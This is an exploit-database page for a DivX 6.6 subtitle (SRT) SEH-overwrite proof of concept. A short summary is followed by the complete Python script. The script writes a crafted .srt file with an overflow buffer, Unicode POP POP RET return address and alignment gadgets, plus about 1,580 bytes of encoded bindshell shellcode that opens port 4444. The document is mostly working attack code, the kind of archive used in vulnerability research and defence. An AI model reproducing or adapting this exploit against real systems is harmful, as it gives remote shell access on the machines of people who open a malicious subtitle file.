header-logo
Suggest Exploit
vendor:
by:
Mati Aharoni, Chris Hadnagy
N/A
CVSS
N/A
SEH overwrite
Unknown
CWE
Product Name:
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: Unknown
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP SP2
Unknown

DivX 6.6 SRT SEH overwrite PoC

This is a proof of concept exploit for the DivX 6.6 SRT vulnerability. It overwrites the Structured Exception Handler (SEH) to gain control of the program flow. The exploit has been tested on Windows XP SP2. The exploit code is written in Python and was developed by Mati Aharoni (muts) and Chris Hadnagy (loganWHD) of Offensive Security. The exploit utilizes a Unicode buffer and a Unicode friendly POP POP RET sequence. The payload includes stack alignment, saving stack registers, and aligning EAX for popad/fd instructions. The exploit also includes a Venetian self-decoding bindshell on port 4444. The bindshell is 1580 bytes in size and is built on alternating 00 01 surface. The exploit includes a buffer and shellcode canvas of 5000000 bytes.

Mitigation:

Unknown
Source

Exploit-DB raw data:

#!/usr/bin/python
#######################################################################
# DivX 6.6 SRT SEH overwrite PoC
# Tested on XP SP2
# Coded by Mati Aharoni, aka muts and Chris Hadnagy, aka loganWHD
# muts..at..offensive-security...dot..com
# chris..at..offensive-security...dot..com
# http://www.offensive-security.com/0day/divx66.py.txt
# Notes: Unicode buffer - real pita.
# Greetz to our wives - thanks for the couch!
#######################################################################
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Documents and Settings\Administrator\Desktop>
#######################################################################
# file = name of avi video file
file="infidel.srt"                           

# Unicode friendly POP POP RET somewhere in DivX 6.6
# Note: \x94 bites back - dealt with by xchg'ing again and doing a dance to shellcode Gods

ret="\x94\x48"

# Align stack for register save
nudge="\x48\x6d"

# Payload building blocks

buffer="\x41" * 1032

xchg="\x94\x6d" # Swap back EAX, ESP for stack save,nop

pushad="\x60\x6d" # Save stack registers,nop

pushfd="\x9c\x6d" 

align_buffer="\x05\xFF\x3C\x6D\x2D\xe1\x3C\x6D\x2D\xFF\x10\x6D\x05\xFF\x10\x6D" # Point to end of buffer

align_eax="\x2D\x2F\x10\x6D\x05\x10\x10\x6D" # Align EAX for popad/fd

popfd="\x9D\x6D" # popfd,nop

popad="\x61\x6D"# popad,nop

padding="\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70" # Crawl with remaining strength on bleeding knees to shellcode

rest= "\x01" * 5000000 # Buffer and shellcode canvas 

# PoC Venetian Bindshell on port 4444 - ph33r
# Built on alternating 00 01 surface
# Venetian self decoding bindshell  - 1580 bytes

bindshell = (buffer + ret + xchg + pushad + pushfd + xchg + align_buffer +
"\x80\xFB\x6D\x40\x6D\x80\x6A\x6D\x40\x6D\x80\xEA\x6D\x40\x6D\x80"
"\x4D\x6D\x40\x6D\x80\xE7\x6D\x40\x6D\x80\xF9\x6D\x40\x6D\x80\xFE"
"\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\x60\x6D"
"\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x6C\x6D\x40\x6D\x80\x23\x6D\x40"
"\x6D\x80\x24\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x45\x6D\x40\x6D"
"\x80\x3B\x6D\x40\x6D\x80\x8B\x6D\x40\x6D\x80\x7B\x6D\x40\x6D\x80"
"\x05\x6D\x40\x6D\x80\x77\x6D\x40\x6D\x80\x01\x6D\x40\x6D\x80\xEE"
"\x6D\x40\x6D\x80\x8B\x6D\x40\x6D\x80\x4E\x6D\x40\x6D\x80\x18\x6D"
"\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x5F\x6D\x40\x6D\x80\x1F\x6D\x40"
"\x6D\x80\x01\x6D\x40\x6D\x80\xEA\x6D\x40\x6D\x80\x49\x6D\x40\x6D"
"\x80\x8A\x6D\x40\x6D\x80\x34\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80"
"\x01\x6D\x40\x6D\x80\xED\x6D\x40\x6D\x80\x31\x6D\x40\x6D\x80\xBF"
"\x6D\x40\x6D\x80\x99\x6D\x40\x6D\x80\xAB\x6D\x40\x6D\x80\x84\x6D"
"\x40\x6D\x80\xBF\x6D\x40\x6D"
"\x80\x74\x6D\x40\x6D\x80\x06\x6D\x40\x6D\x80\xC1\x6D\x40\x6D\x80"
"\xC9\x6D\x40\x6D\x80\xEF\x6D\x80\x1E\x6D\x40\x6D\x40\x6D\x80\xC2"
"\x6D\x40\x6D\x80\xEA\x6D\x40\x6D\x80\xF4\x6D\x40\x6D\x80\x3A\x6D"
"\x40\x6D\x80\x54\x6D\x40\x6D\x80\x23\x6D\x40\x6D\x80\x28\x6D\x40"
"\x6D\x80\x74\x6D\x40\x6D\x80\xE5\x6D\x40\x6D\x80\x8A\x6D\x40\x6D"
"\x80\x5F\x6D\x40\x6D\x80\x23\x6D\x40\x6D\x80\x01\x6D\x40\x6D\x80"
"\xEA\x6D\x40\x6D\x80\x66\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x0C"
"\x6D\x40\x6D\x80\x4A\x6D\x40\x6D\x80\x8B\x6D\x40\x6D\x80\x5E\x6D"
"\x40\x6D\x80\x1C\x6D\x40\x6D\x40\x6D\x80\xEB\x6D\x40\x6D\x80\x02"
"\x6D\x40\x6D\x80\x2C\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x89\x6D"
"\x40\x6D\x80\x6B\x6D\x40\x6D\x80\x24\x6D\x40\x6D\x80\x1B\x6D\x40"
"\x6D\x80\x61\x6D\x40\x6D\x80\xC2\x6D\x40\x6D\x80\x31\x6D\x40\x6D"
"\x80\xDA\x6D\x40\x6D\x80\x64\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80"
"\x43\x6D\x40\x6D\x80\x2F\x6D\x40\x6D\x80\x8B\x6D\x40\x6D\x80\x3F"
"\x6D\x40\x6D\x80\x0C\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x70\x6D"
"\x40\x6D\x80\x1B\x6D\x40\x6D\x80\xAD\x6D\x40\x6D\x80\x8A\x6D\x40"
"\x6D\x80\x40\x6D\x40\x6D\x80\x07\x6D\x40\x6D\x80\x5E\x6D\x40\x6D"
"\x80\x67\x6D\x40\x6D\x80\x8E\x6D\x40\x6D\x80\x4D\x6D\x40\x6D\x80"
"\x0E\x6D\x40\x6D\x80\xEB\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80\xFE"
"\x6D\x40\x6D\x80\xD6\x6D\x40\x6D\x80\x65\x6D\x40\x6D\x80\x53\x6D"
"\x40\x6D\x80\x65\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\x32\x6D\x40"
"\x6D\x80\x32\x6D\x40\x6D\x80\x67\x6D\x40\x6D\x80\x77\x6D\x40\x6D"
"\x80\x72\x6D\x40\x6D\x80\x32\x6D\x40\x6D\x80\x5E\x6D\x40\x6D\x80"
"\x54\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\xD0\x6D\x40\x6D\x80\x67"
"\x6D\x40\x6D\x80\xCB\x6D\x40\x6D\x80\xEC\x6D\x40\x6D\x80\xFC\x6D"
"\x40\x6D\x80\x3A\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80\xFE\x6D\x40"
"\x6D\x80\xD6\x6D\x40\x6D\x80\x5E\x6D\x40\x6D\x80\x89\x6D\x40\x6D"
"\x80\xE4\x6D\x40\x6D\x80\x66\x6D\x40\x6D\x80\x80\x6D\x40\x6D\x80"
"\xED\x6D\x40\x6D\x80\x07\x6D\x40\x6D\x80\x02\x6D\x40\x6D\x80\x54"
"\x6D\x40\x6D\x80\x6A\x6D\x40\x6D\x80\x01\x6D\x40\x6D\x80\xFF\x6D"
"\x40\x6D\x80\xCF\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xD8\x6D\x40"
"\x6D\x80\x09\x6D\x40\x6D\x80\xF4\x6D\x40\x6D\x80\xAD\x6D\x40\x6D"
"\x80\x56\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40\x6D\x80"
"\x53\x6D\x40\x6D\x80\x52\x6D\x40\x6D\x80\x53\x6D\x40\x6D\x80\x52"
"\x6D\x40\x6D\x80\x53\x6D\x40\x6D\x80\x42\x6D\x40\x6D\x80\x53\x6D"
"\x40\x6D\x80\x42\x6D\x40\x6D\x80\x53\x6D\x40\x6D\x80\xFE\x6D\x40"
"\x6D\x80\xD0\x6D\x40\x6D\x80\x65\x6D\x40\x6D\x80\x68\x6D\x40\x6D"
"\x80\x10\x6D\x40\x6D\x80\x5C\x6D\x40\x6D\x80\x65\x6D\x40\x6D\x80"
"\x53\x6D\x40\x6D\x80\x88\x6D\x40\x6D\x80\xE1\x6D\x40\x6D\x80\x94"
"\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xA3\x6D\x40\x6D\x80\x1A\x6D"
"\x40\x6D\x80\x6F\x6D\x40\x6D\x80\xC7\x6D\x40\x6D\x80\x56\x6D\x40"
"\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40\x6D\x80\x6A\x6D\x40\x6D"
"\x80\x0F\x6D\x40\x6D\x80\x51\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80"
"\xFF\x6D\x40\x6D\x80\xCF\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xA3"
"\x6D\x40\x6D\x80\xAD\x6D\x40\x6D\x80\x2D\x6D\x40\x6D\x80\xE9\x6D"
"\x40\x6D\x80\x56\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40"
"\x6D\x80\x53\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80\xFF\x6D\x40\x6D"
"\x80\xCF\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xE4\x6D\x40\x6D\x80"
"\x49\x6D\x40\x6D\x80\x85\x6D\x40\x6D\x80\x49\x6D\x40\x6D\x80\x56"
"\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40\x6D\x80\x50\x6D"
"\x40\x6D\x80\x53\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80\x54\x6D\x40"
"\x6D\x80\xFF\x6D\x40\x6D\x80\xCF\x6D\x40\x6D\x80\x93\x6D\x40\x6D"
"\x80\x67\x6D\x40\x6D\x80\xE7\x6D\x40\x6D\x80\x78\x6D\x40\x6D\x80"
"\xC6\x6D\x40\x6D\x80\x78\x6D\x40\x6D\x80\x57\x6D\x40\x6D\x80\xFE"
"\x6D\x40\x6D\x80\xD6\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80\xFF\x6D"
"\x40\x6D\x80\xCF\x6D\x40\x6D\x80\x66\x6D\x40\x6D\x80\x69\x6D\x40"
"\x6D\x80\x64\x6D\x40\x6D\x80\x65\x6D\x40\x6D\x80\x68\x6D\x40\x6D"
"\x80\x62\x6D\x40\x6D\x80\x6D\x6D\x40\x6D\x80\x88\x6D\x40\x6D\x80"
"\xE5\x6D\x40\x6D\x80\x69\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80\x58"
"\x6D\x40\x6D\x80\x29\x6D\x40\x6D\x80\xCB\x6D\x40\x6D\x80\x89\x6D"
"\x40\x6D\x80\xE6\x6D\x40\x6D\x80\x6A\x6D\x40\x6D\x80\x43\x6D\x40"
"\x6D\x80\x89\x6D\x40\x6D\x80\xE1\x6D\x40\x6D\x80\x31\x6D\x40\x6D"
"\x80\xBF\x6D\x40\x6D\x80\xF3\x6D\x40\x6D\x80\xA9\x6D\x40\x6D\x80"
"\xFE\x6D\x40\x6D\x80\x41\x6D\x40\x6D\x80\x2D\x6D\x40\x6D\x80\xFD"
"\x6D\x40\x6D\x80\x42\x6D\x40\x6D\x80\x2B\x6D\x40\x6D\x80\x93\x6D"
"\x40\x6D\x80\x8C\x6D\x40\x6D\x80\x7A\x6D\x40\x6D\x80\x37\x6D\x40"
"\x6D\x80\xAB\x6D\x40\x6D\x80\xAA\x6D\x40\x6D\x80\xAB\x6D\x40\x6D"
"\x80\x67\x6D\x40\x6D\x80\x72\x6D\x40\x6D\x80\xFD\x6D\x40\x6D\x80"
"\xB3\x6D\x40\x6D\x80\x15\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\x74"
"\x6D\x40\x6D\x80\x44\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\xD6\x6D"
"\x40\x6D\x80\x5A\x6D\x40\x6D\x80\x57\x6D\x40\x6D\x80\x51\x6D\x40"
"\x6D\x80\x51\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80\x51\x6D\x40\x6D"
"\x80\x69\x6D\x40\x6D\x80\x01\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80"
"\x51\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80\x51\x6D\x40\x6D\x80\xFE"
"\x6D\x40\x6D\x80\xD0\x6D\x40\x6D\x80\x67\x6D\x40\x6D\x80\xAD\x6D"
"\x40\x6D\x80\xD8\x6D\x40\x6D\x80\x05\x6D\x40\x6D\x80\xCD\x6D\x40"
"\x6D\x80\x53\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\xD6\x6D\x40\x6D"
"\x80\x69\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80"
"\x37\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\xD0\x6D\x40\x6D\x80\x8A"
"\x6D\x40\x6D\x80\x57\x6D\x40\x6D\x80\xFB\x6D\x40\x6D\x80\x83\x6D"
"\x40\x6D\x80\xC3\x6D\x40\x6D\x80\x64\x6D\x40\x6D\x80\xFE\x6D\x40"
"\x6D\x80\xD6\x6D\x40\x6D\x80\x51\x6D\x40\x6D\x80\xFF\x6D\x40\x6D"
"\x80\xCF\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xEE\x6D\x40\x6D\x80"
"\xCE\x6D\x40\x6D\x80\xDF\x6D\x40\x6D\x80\x60\x6D\x40\x6D\x80\x52"
"\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40\x6D\x80\xFF\x6D"
"\x40\x6D\x80\xCF\x6D" + nudge * 60 + align_eax + xchg +popfd +popad +padding + rest)

f=open(file,'w')
f.write("1 \n")
f.write("00:00:01,001 --> 00:00:02,001\n")
f.write(bindshell)
f.close()                                              
print "DivX 6.6 SEH SRT Overflow - PoC\n";    
print "http://www.offensive-security.com/0day/divx66.py.txt\n";    
print "SRT has been created - ph33r \n";    

# milw0rm.com [2008-04-18]

Navigation

Suggest Exploit

Services By CQR